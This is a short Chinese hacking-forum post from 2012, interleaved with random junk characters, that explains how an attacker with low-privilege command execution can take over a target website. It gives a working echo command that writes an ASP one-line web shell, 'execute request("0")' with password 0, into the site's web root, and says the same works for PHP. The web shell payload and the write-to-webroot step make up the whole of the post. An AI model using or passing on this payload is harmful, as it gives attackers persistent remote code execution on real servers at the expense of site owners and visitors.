在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。$ ^2 |+ W+ L! v$ w4 Z4 n
3 s+ F; G2 d+ T: w命令格式
+ n) k0 Q) F2 u1 O; n
+ X1 Q& D3 h. b7 t. y8 @% m* oEcho 语句 >目标站绝对目录# u+ ? ?9 X p2 O
! S) p' E2 c3 H6 n
例如: V1 t/ t( f9 ~0 u( C+ \: C
' y0 v; W! i! N8 b Cecho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
: T& j' m, V/ T; H4 b; Q: I
; \. x& X0 L7 u2 g+ m. u% l这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。 G% ?3 V# x. m% T0 |4 m1 _& \
|
发表于 2012-9-23 14:40:24
收藏
支持
反对